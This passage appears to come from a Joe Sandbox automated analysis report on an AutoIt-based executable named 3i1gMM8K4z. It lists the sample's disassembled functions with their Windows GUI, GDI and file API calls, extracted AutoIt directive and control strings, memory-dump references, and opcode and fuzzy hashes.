                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                            • Instruction ID: 276d7d2d0c4c2a85595d8678321a0a5fd77c82e3429e17cbd97dc36677d769a1
                                                                                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                            • Instruction Fuzzy Hash: E8C1713260A1930ADF2D473AC47417EBBA17EA27B135A076DD4B3DB1D4EE20C965F620
                                                                                                                            Function 00F57806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00F5785B
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00F5786D
                                                                                                                            • DestroyWindow.USER32 ref: 00F5787B
                                                                                                                            • GetDesktopWindow.USER32 ref: 00F57895
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00F5789C
                                                                                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F579DD
                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F579ED
                                                                                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57A35
                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00F57A41
                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F57A7B
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57A9D
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57AB0
                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57ABB
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00F57AC4
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57AD3
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00F57ADC
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57AE3
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00F57AEE
                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57B00
                                                                                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F72CAC,00000000), ref: 00F57B16
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00F57B26
                                                                                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F57B4C
                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F57B6B
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57B8D
                                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57D7A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                                            • Opcode ID: 345d2aeb5319c2da1ae0e6f740c9ef33ca0031254378f3d4a6b668267eb576d5
                                                                                                                            • Instruction ID: e29a7a7fb7e0a22c19b2c8aef103f76a1ae27dc227051883072c6162d2c5fc7a
                                                                                                                            • Opcode Fuzzy Hash: 345d2aeb5319c2da1ae0e6f740c9ef33ca0031254378f3d4a6b668267eb576d5
                                                                                                                            • Instruction Fuzzy Hash: C2028F71900219EFDB14DFA4EC89EAE7BB9FF49311F108168F915AB2A1C7709D05DB60
                                                                                                                            Function 00F6356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CharUpperBuffW.USER32(?,?,00F6F910), ref: 00F63627
                                                                                                                            • IsWindowVisible.USER32(?), ref: 00F6364B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharUpperVisibleWindow
                                                                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                            • API String ID: 4105515805-45149045
                                                                                                                            • Opcode ID: d2e83133b36291cfdebd7b132d27824aa07cf1cc72398d9a967862c4a77ddf9b
                                                                                                                            • Instruction ID: 3d74bdd860b64b8ace01e7c391d9b7822566892f495da0cbde2f8dc93f73b973
                                                                                                                            • Opcode Fuzzy Hash: d2e83133b36291cfdebd7b132d27824aa07cf1cc72398d9a967862c4a77ddf9b
                                                                                                                            • Instruction Fuzzy Hash: 20D17E712083419BCB04EF14C851A6E77E2AF94364F154468F8865B3E3DB69EE4AFB42
                                                                                                                            Function 00F6A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00F6A630
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00F6A661
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00F6A66D
                                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00F6A687
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00F6A696
                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00F6A6C1
                                                                                                                            • GetSysColor.USER32(00000010), ref: 00F6A6C9
                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00F6A6D0
                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00F6A6DF
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00F6A6E6
                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00F6A731
                                                                                                                            • FillRect.USER32(?,?,00000000), ref: 00F6A763
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F6A78E
                                                                                                                              • Part of subcall function 00F6A8CA: GetSysColor.USER32(00000012), ref: 00F6A903
                                                                                                                              • Part of subcall function 00F6A8CA: SetTextColor.GDI32(?,?), ref: 00F6A907
                                                                                                                              • Part of subcall function 00F6A8CA: GetSysColorBrush.USER32(0000000F), ref: 00F6A91D
                                                                                                                              • Part of subcall function 00F6A8CA: GetSysColor.USER32(0000000F), ref: 00F6A928
                                                                                                                              • Part of subcall function 00F6A8CA: GetSysColor.USER32(00000011), ref: 00F6A945
                                                                                                                              • Part of subcall function 00F6A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F6A953
                                                                                                                              • Part of subcall function 00F6A8CA: SelectObject.GDI32(?,00000000), ref: 00F6A964
                                                                                                                              • Part of subcall function 00F6A8CA: SetBkColor.GDI32(?,00000000), ref: 00F6A96D
                                                                                                                              • Part of subcall function 00F6A8CA: SelectObject.GDI32(?,?), ref: 00F6A97A
                                                                                                                              • Part of subcall function 00F6A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00F6A999
                                                                                                                              • Part of subcall function 00F6A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F6A9B0
                                                                                                                              • Part of subcall function 00F6A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00F6A9C5
                                                                                                                              • Part of subcall function 00F6A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F6A9ED
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3521893082-0
                                                                                                                            • Opcode ID: 043400212c794754ef29ed4d7a49de3716b40b895194e2591be7fbb36183b759
                                                                                                                            • Instruction ID: 69709788225b1c6c3627aed9b58a79a1a9506d4357493f712caab0e60cc2f620
                                                                                                                            • Opcode Fuzzy Hash: 043400212c794754ef29ed4d7a49de3716b40b895194e2591be7fbb36183b759
                                                                                                                            • Instruction Fuzzy Hash: A4916B72408305BFC7109F64EC08A5B7BA9FF89331F144A29F962A61A1D7B1D948EF52
                                                                                                                            Function 00EE2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(?,?,?), ref: 00EE2CA2
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00EE2CE8
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00EE2CF3
                                                                                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00EE2CFE
                                                                                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00EE2D09
                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F1C43B
                                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F1C474
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F1C89D
                                                                                                                              • Part of subcall function 00EE1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EE2036,?,00000000,?,?,?,?,00EE16CB,00000000,?), ref: 00EE1B9A
                                                                                                                            • SendMessageW.USER32(?,00001053), ref: 00F1C8DA
                                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F1C8F1
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F1C907
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F1C912
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 464785882-4108050209
                                                                                                                            • Opcode ID: b85189d3c20c79ef7c4f2eb9bce46ee17e037d312a594015825ecf04b7ea64ab
                                                                                                                            • Instruction ID: 7f564d549f239b04c0d3b586ed303d6897b1d22d0b068d6b40820c029858fbe5
                                                                                                                            • Opcode Fuzzy Hash: b85189d3c20c79ef7c4f2eb9bce46ee17e037d312a594015825ecf04b7ea64ab
                                                                                                                            • Instruction Fuzzy Hash: 5012AE30644245EFDB10CF25C884BA9BBE5BF04320F68556DF59ADB262C771EC81EB91
                                                                                                                            Function 00F574AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(00000000), ref: 00F574DE
                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F5759D
                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F575DB
                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F575ED
                                                                                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F57633
                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00F5763F
                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F57683
                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F57692
                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00F576A2
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00F576A6
                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F576B6
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F576BF
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00F576C8
                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F576F4
                                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F5770B
                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F57746
                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F5775A
                                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F5776B
                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F5779B
                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00F577A6
                                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F577B1
                                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F577BB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                            • API String ID: 2910397461-517079104
                                                                                                                            • Opcode ID: 6024db34838d2ec485f579b89826cf63cd912309bfb04d1e73624d3c01135329
                                                                                                                            • Instruction ID: 090cbe05efa41e18024042b6a824844fe7bb105692738cb0709d9ec14bd46d7f
                                                                                                                            • Opcode Fuzzy Hash: 6024db34838d2ec485f579b89826cf63cd912309bfb04d1e73624d3c01135329
                                                                                                                            • Instruction Fuzzy Hash: 24A181B1A00609BFEB14DFA4EC4AFAE7BB9EB05710F044114FA15A72E1D7B0AD04DB64
                                                                                                                            Function 00F4AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00F4AD1E
                                                                                                                            • GetDriveTypeW.KERNEL32(?,00F6FAC0,?,\\.\,00F6F910), ref: 00F4ADFB
                                                                                                                            • SetErrorMode.KERNEL32(00000000,00F6FAC0,?,\\.\,00F6F910), ref: 00F4AF59
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                            • API String ID: 2907320926-4222207086
                                                                                                                            • Opcode ID: 7b0b51901beeb2562fd16d34b02a52a79a60077eb20a416053607776c99aba68
                                                                                                                            • Instruction ID: dd136b86e1ad611a7588210bd14e20f085304e42ed89f1530ccb5c6950cd7a59
                                                                                                                            • Opcode Fuzzy Hash: 7b0b51901beeb2562fd16d34b02a52a79a60077eb20a416053607776c99aba68
                                                                                                                            • Instruction Fuzzy Hash: 5251B6B2A84209AB9F00DF11C942DBD7BA1EB497607244056EC07A72D5CA7ADD4AFB43
                                                                                                                            Function 00EE68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsnicmp
                                                                                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                            • API String ID: 1038674560-86951937
                                                                                                                            • Opcode ID: 69fe56c0bf05b700a446856fbfe46a6b7b93232ebca2666dbf424907a7a64b90
                                                                                                                            • Instruction ID: 8b50f3d956997021bc12f9f71cfcca32e64417ef6df666b8e1ca95212e3f9526
                                                                                                                            • Opcode Fuzzy Hash: 69fe56c0bf05b700a446856fbfe46a6b7b93232ebca2666dbf424907a7a64b90
                                                                                                                            • Instruction Fuzzy Hash: 6D8129B1A002496ACF10AF61EC43FEE37A8AF25754F045025FC05BA1D6EB75DE45F251
                                                                                                                            Function 00F6A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32(00000012), ref: 00F6A903
                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00F6A907
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00F6A91D
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00F6A928
                                                                                                                            • CreateSolidBrush.GDI32(?), ref: 00F6A92D
                                                                                                                            • GetSysColor.USER32(00000011), ref: 00F6A945
                                                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F6A953
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00F6A964
                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00F6A96D
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00F6A97A
                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00F6A999
                                                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F6A9B0
                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00F6A9C5
                                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F6A9ED
                                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F6AA14
                                                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00F6AA32
                                                                                                                            • DrawFocusRect.USER32(?,?), ref: 00F6AA3D
                                                                                                                            • GetSysColor.USER32(00000011), ref: 00F6AA4B
                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00F6AA53
                                                                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F6AA67
                                                                                                                            • SelectObject.GDI32(?,00F6A5FA), ref: 00F6AA7E
                                                                                                                            • DeleteObject.GDI32(?), ref: 00F6AA89
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00F6AA8F
                                                                                                                            • DeleteObject.GDI32(?), ref: 00F6AA94
                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00F6AA9A
                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00F6AAA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1996641542-0
                                                                                                                            • Opcode ID: 00915581046571408aee373aaa95f88d36e25984f270d0b776e7cb5587991881
                                                                                                                            • Instruction ID: c1262ec7e41ca251033bb7b71f6351862877ba5554e595e78b75f82e45b0de6b
                                                                                                                            • Opcode Fuzzy Hash: 00915581046571408aee373aaa95f88d36e25984f270d0b776e7cb5587991881
                                                                                                                            • Instruction Fuzzy Hash: 34513E71900208FFDB109FA4ED48EAE7B79EF09320F254125F921AB2A1D7B59D44EF50
                                                                                                                            Function 00F689D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F68AC1
                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F68AD2
                                                                                                                            • CharNextW.USER32(0000014E), ref: 00F68B01
                                                                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F68B42
                                                                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F68B58
                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F68B69
                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F68B86
                                                                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00F68BD8
                                                                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F68BEE
                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F68C1F
                                                                                                                            • _memset.LIBCMT ref: 00F68C44
                                                                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F68C8D
                                                                                                                            • _memset.LIBCMT ref: 00F68CEC
                                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F68D16
                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F68D6E
                                                                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00F68E1B
